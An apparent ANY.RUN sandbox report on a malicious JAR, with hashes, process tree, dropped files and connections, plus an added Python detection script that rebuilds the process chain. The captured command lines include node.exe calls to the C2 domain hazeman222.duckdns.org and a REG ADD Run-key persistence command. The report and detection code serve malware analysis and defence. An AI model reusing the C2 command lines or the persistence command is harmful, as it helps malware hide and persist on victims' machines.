deliveryinfo.jar

Full analysis: https://app.any.run/tasks/54eefd28-e707-4a1f-b45d-9dee8f2f2f89
Verdict: Malicious activity
Analysis date: September 30, 2020, 03:23:17
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/java-archive
File info: Java archive data (JAR)
MD5: 724141C6922AB8E19C262D269AA8AEE1
SHA1: 0D2BF53FA5138AA22B1585F5C5093DFBE65DFCD0
SHA256: A3B9D353EF66B0E9F9920E9F4D520E67E40F9F8AC855EDF42BFA3BE4492FCF1D
SSDEEP: 12288:whSM3uQPBuy9mwsG+BXT4zsvuXEAr/qWy5khwG/:whSUuQpBxsG+NT4dXrriWGSH/
ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Changes the autorun value in the registry: reg.exe (PID: 3420)
  • SUSPICIOUS
    • Creates files in the user directory: javaw.exe (PID: 572)
    • Starts CMD.EXE for commands execution: node.exe (PID: 2932)
    • Application launched itself: javaw.exe (PID: 2280), node.exe (PID: 1208), node.exe (PID: 3968)
    • Executable content was dropped or overwritten: javaw.exe (PID: 572)
    • Executes JAVA applets: javaw.exe (PID: 2280)
    • Uses REG.EXE to modify Windows registry: cmd.exe (PID: 3996)
    • Reads CPU info: node.exe (PID: 2932)
  • INFO
    • Dropped object may contain Bitcoin addresses: javaw.exe (PID: 572)
No Malware configuration.

TRiD

.jar | Java Archive (78.3)
.zip | ZIP compressed archive (21.6)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0808
ZipCompression: Deflated
ZipModifyDate: 2020:09:25 16:24:26
ZipCRC: 0x00000000
ZipCompressedSize: 2
ZipUncompressedSize: -
ZipFileName: META-INF/
No data.
Total processes: 42
Monitored processes: 7
Malicious processes: 0
Suspicious processes: 5

Behavior graph

Processes shown in the graph, starting from the launch of the sample (parent/child links are listed under Process information; "no specs" marks a process with no indicators attached): javaw.exe (no specs), javaw.exe, node.exe, node.exe (no specs), node.exe, cmd.exe (no specs), reg.exe

Process information

Each entry lists PID, command line (CMD), image path, parent process, then process details and loaded modules.
PID: 572
CMD: "C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar C:\Users\admin\AppData\Local\Temp\4e5716af.tmp
Path: C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe
Parent process: javaw.exe
User:
admin
Company:
Oracle Corporation
Integrity Level:
MEDIUM
Description:
Java(TM) Platform SE binary
Exit code:
0
Version:
8.0.920.14
Modules
Images
c:\program files\java\jre1.8.0_92\bin\javaw.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 1208
CMD: C:\Users\admin\node-v14.12.0-win-x86\node.exe C:\Users\admin\AppData\Local\Temp\_qhub_node_b4Cqun\boot.js --hub-domain hazeman222.duckdns.org
Path: C:\Users\admin\node-v14.12.0-win-x86\node.exe
Parent process: node.exe
User:
admin
Company:
Node.js
Integrity Level:
MEDIUM
Description:
Node.js: Server-side JavaScript
Exit code:
0
Version:
14.12.0
Modules
Images
c:\users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\node.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
PID: 2280
CMD: "C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\deliveryinfo.jar"
Path: C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe
Parent process: explorer.exe
User:
admin
Company:
Oracle Corporation
Integrity Level:
MEDIUM
Description:
Java(TM) Platform SE binary
Exit code:
0
Version:
8.0.920.14
Modules
Images
c:\program files\java\jre1.8.0_92\bin\javaw.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 2932
CMD: C:\Users\admin\node-v14.12.0-win-x86\node.exe C:\Users\admin\AppData\Local\Temp\_qhub_node_b4Cqun\boot.js --hub-domain hazeman222.duckdns.org
Path: C:\Users\admin\node-v14.12.0-win-x86\node.exe
Parent process: node.exe
User:
admin
Company:
Node.js
Integrity Level:
MEDIUM
Description:
Node.js: Server-side JavaScript
Exit code:
0
Version:
14.12.0
Modules
Images
c:\users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\node.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
PID: 3420
CMD: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "e8529f2a-975c-451b-9760-2a0bb1500d9d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\admin\qhub\node\2.0.10\boot.vbs\""
Path: C:\Windows\system32\reg.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\reg.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 3968
CMD: C:\Users\admin\node-v14.12.0-win-x86\node.exe - --hub-domain hazeman222.duckdns.org
Path: C:\Users\admin\node-v14.12.0-win-x86\node.exe
Parent process: javaw.exe
User:
admin
Company:
Node.js
Integrity Level:
MEDIUM
Description:
Node.js: Server-side JavaScript
Exit code:
0
Version:
14.12.0
Modules
Images
c:\users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\node.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
PID: 3996
CMD: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "e8529f2a-975c-451b-9760-2a0bb1500d9d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\admin\qhub\node\2.0.10\boot.vbs\"""
Path: C:\Windows\system32\cmd.exe
Parent process: node.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events: 39
Read events: 38
Write events: 1
Delete events: 0

Modification events

(PID) Process: (3420) reg.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: e8529f2a-975c-451b-9760-2a0bb1500d9d
Value: cmd /D /C "C:\Users\admin\qhub\node\2.0.10\boot.vbs"
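The chain this report records is a compact detection case: explorer.exe runs the JAR through javaw.exe, javaw.exe unpacks a Node.js runtime under the user profile and starts node.exe with "- --hub-domain hazeman222.duckdns.org" (the lone "-" makes node read its script from stdin rather than from a file on disk), and node.exe then drives cmd.exe and reg.exe to write an HKCU Run value that points at boot.vbs. The following Python is an added example written for this page, not ANY.RUN's code or anything from the sample: it encodes that chain as constructed process-creation events and runs four rules over them. Command lines and image paths are copied from the Process information section; the parent PIDs (1000 for explorer.exe, and which node.exe spawned which) are assumptions, because the report names only parent images.

```python
"""Detection rules for the process chain in this report (added example, not
ANY.RUN's code). Input is the shape Sysmon Event ID 1 or EDR telemetry gives:
pid, ppid, image path, command line. Rules: a Java launcher running a JAR from
a user temp directory; a scripting runtime executed from a user-writable path
with a dynamic-DNS domain on its command line, or its script fed over stdin;
a Run-key write; and a Java launcher in the ancestry of that write."""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str


RUN_KEY_RE = re.compile(
    r'\breg(?:\.exe)?\s+add\s+"?(?:HKCU|HKEY_CURRENT_USER|HKLM|HKEY_LOCAL_MACHINE)'
    r'\\software\\microsoft\\windows\\currentversion\\run(?:once)?\b', re.I)
RUN_DATA_RE = re.compile(r'/d\s+"((?:[^"\\]|\\.)*)"', re.I)   # /D "..." with \" escapes
SCRIPT_EXT_RE = re.compile(r'\.(?:vbs|vbe|js|jse|wsf|bat|cmd|ps1|hta)\b', re.I)
JAR_TEMP_RE = re.compile(r'-jar\s+"?[a-z]:\\users\\[^"\s]*\\(?:temp|appdata)\\', re.I)
USER_WRITABLE_RE = re.compile(r'^[a-z]:\\users\\', re.I)
DYN_DNS_RE = re.compile(
    r'\b[\w.-]+\.(?:duckdns\.org|no-ip\.(?:com|org|biz)|ddns\.net|hopto\.org)\b', re.I)
SCRIPT_HOSTS = {"node.exe", "python.exe", "pythonw.exe", "wscript.exe",
                "cscript.exe", "powershell.exe", "mshta.exe"}
JAVA_LAUNCHERS = {"java.exe", "javaw.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[str]:
    """Image basenames from ev up to the root (ev first); stops on unknown or cyclic ppid."""
    chain, seen, cur = [], set(), ev
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(basename(cur.image))
        cur = by_pid.get(cur.ppid)
    return chain


def analyze(events: List[ProcEvent]) -> List[dict]:
    by_pid = {e.pid: e for e in events}
    findings: List[dict] = []

    def hit(ev: ProcEvent, rule: str, severity: str, detail: str = "") -> None:
        findings.append({"pid": ev.pid, "image": basename(ev.image),
                         "rule": rule, "severity": severity, "detail": detail})

    for ev in events:
        name = basename(ev.image)
        if name in JAVA_LAUNCHERS and JAR_TEMP_RE.search(ev.cmdline):
            hit(ev, "jar_from_temp", "medium", ev.cmdline)
        if name in SCRIPT_HOSTS and USER_WRITABLE_RE.match(ev.image):
            m = DYN_DNS_RE.search(ev.cmdline)
            if m:
                hit(ev, "dyndns_c2", "high", m.group(0).lower())
            if "-" in ev.cmdline.split():          # script body arrives on stdin
                hit(ev, "script_on_stdin", "medium")
        if RUN_KEY_RE.search(ev.cmdline):          # matches reg.exe and the cmd.exe wrapper
            data = RUN_DATA_RE.search(ev.cmdline)
            value = data.group(1) if data else ""
            sev = "high" if SCRIPT_EXT_RE.search(value) else "medium"
            hit(ev, "run_key_persistence", sev, value)
            chain = ancestry(ev, by_pid)
            if JAVA_LAUNCHERS & set(chain[1:]):
                hit(ev, "java_launcher_ancestry", "high", " <- ".join(chain))
    return findings


# Constructed sample built from this report. Image paths and command lines are the
# report's; the ppid values are assumed (the report gives only parent image names).
NODE = r"C:\Users\admin\node-v14.12.0-win-x86\node.exe"
JAVAW = r"C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe"
BOOT = r"C:\Users\admin\AppData\Local\Temp\_qhub_node_b4Cqun\boot.js"
REG_ADD = (r'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" '
           r'/V "e8529f2a-975c-451b-9760-2a0bb1500d9d" /t REG_SZ /F '
           r'/D "cmd /D /C \"C:\Users\admin\qhub\node\2.0.10\boot.vbs\""')
EVENTS = [
    ProcEvent(1000, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2280, 1000, JAVAW, '"' + JAVAW + r'" -jar "C:\Users\admin\AppData\Local\Temp\deliveryinfo.jar"'),
    ProcEvent(572, 2280, JAVAW, '"' + JAVAW + r'" -jar C:\Users\admin\AppData\Local\Temp\4e5716af.tmp'),
    ProcEvent(3968, 572, NODE, NODE + " - --hub-domain hazeman222.duckdns.org"),
    ProcEvent(1208, 3968, NODE, NODE + " " + BOOT + " --hub-domain hazeman222.duckdns.org"),
    ProcEvent(2932, 1208, NODE, NODE + " " + BOOT + " --hub-domain hazeman222.duckdns.org"),
    ProcEvent(3996, 2932, r"C:\Windows\system32\cmd.exe", r'C:\Windows\system32\cmd.exe /d /s /c "' + REG_ADD + '"'),
    ProcEvent(3420, 3996, r"C:\Windows\system32\reg.exe", REG_ADD),
]
BY_PID = {e.pid: e for e in EVENTS}


def run_report() -> List[dict]:
    return analyze(EVENTS)


if __name__ == "__main__":
    for f in run_report():
        print(f"{f['severity']:6} pid={f['pid']:<5} {f['image']:10} {f['rule']:24} {f['detail'][:70]}")
```

Run it directly to print the findings. The Run-key rule scores the write high only when the value data names a script file, so a benign Run entry that launches an installed .exe stays at medium; the ancestry rule is what turns the otherwise generic reg.exe event into a Java-dropper signal.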
Executable files: 2
Suspicious files: 2
Text files: 3597
Unknown types: 7

Dropped files

Each entry lists PID, process, filename and type, followed by MD5/SHA256 as the report shows them (blank where the report gives none).

572  javaw.exe  C:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\node.exe
MD5:
SHA256:
2280  javaw.exe  C:\Users\admin\AppData\Local\Temp\4e5716af.tmp  (java)
MD5:
SHA256:
572  javaw.exe  C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp  (text)
MD5:
SHA256:
2280  javaw.exe  C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp  (text)
MD5:
SHA256:
572  javaw.exe  C:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\CHANGELOG.md  (html)
MD5: 5F15C768C60610B0F12C9BDE18D5EF36
SHA256: 5025CB1E5A255FB05B0E1263BE2AE9652EC95B0D380FCEBF88863E8BADF1B894
572  javaw.exe  C:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\LICENSE  (text)
MD5: A249503208BA72F4ABC790A08C1025C5
SHA256: 6C351F95A850B485A662E8B43003D8CA56CD663BE625981D7203A05D2CF587E0
572  javaw.exe  C:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\node_modules\npm\.mailmap  (text)
MD5: 50FF5F4745B5210D1DDC6CB3AD21216B
SHA256: EC219650D5ED44D58B1F6CD6E8CCC116E118D7569E09ED19E9B80F5C8BE87D5B
572  javaw.exe  C:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\install_tools.bat  (text)
MD5: 2CD17E6D9A33A0BD00C2E18E6D41BC6F
SHA256: C7C05DE977EEFD931B54B482405C87A2F002AF3BC83A9C2FECA21B05915983B9
572  javaw.exe  C:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\node_etw_provider.man  (text)
MD5: 1D51E18A7247F47245B0751F16119498
SHA256: 1975AA34C1050B8364491394CEBF6E668E2337C3107712E3EECA311262C7C46F
572  javaw.exe  C:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\node_modules\npm\.licensee.json  (text)
MD5: B133415ABE39E5C1865AAD84712B3941
SHA256: 66218BC67A524799BA7CCAD7C493A8D24EEED81C07BED24E0C3034ABA6014061
HTTP(S) requests: 0
TCP/UDP connections: 6
DNS requests: 3
Threats: 3

HTTP requests

No HTTP requests

Connections

PID   Process    IP                   Domain                  ASN                           CN  Reputation
572   javaw.exe  104.20.22.46:443     nodejs.org              Cloudflare Inc                US  shared
3968  node.exe   94.156.189.108:443   hazeman222.duckdns.org  BelCloud Hosting Corporation  BG  unknown
2932  node.exe   94.156.189.108:443   hazeman222.duckdns.org  BelCloud Hosting Corporation  BG  unknown
2932  node.exe   95.217.228.176:443   wtfismyip.com           Hetzner Online GmbH           DE  malicious

DNS requests

Domain
IP
Reputation
nodejs.org
  • 104.20.22.46
  • 104.20.23.46
whitelisted
hazeman222.duckdns.org
  • 94.156.189.108
malicious
wtfismyip.com
  • 95.217.228.176
shared

Threats

PID   Process      Class          Message
1056  svchost.exe  Misc activity  ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2 ETPRO signatures available at the full report
No debug info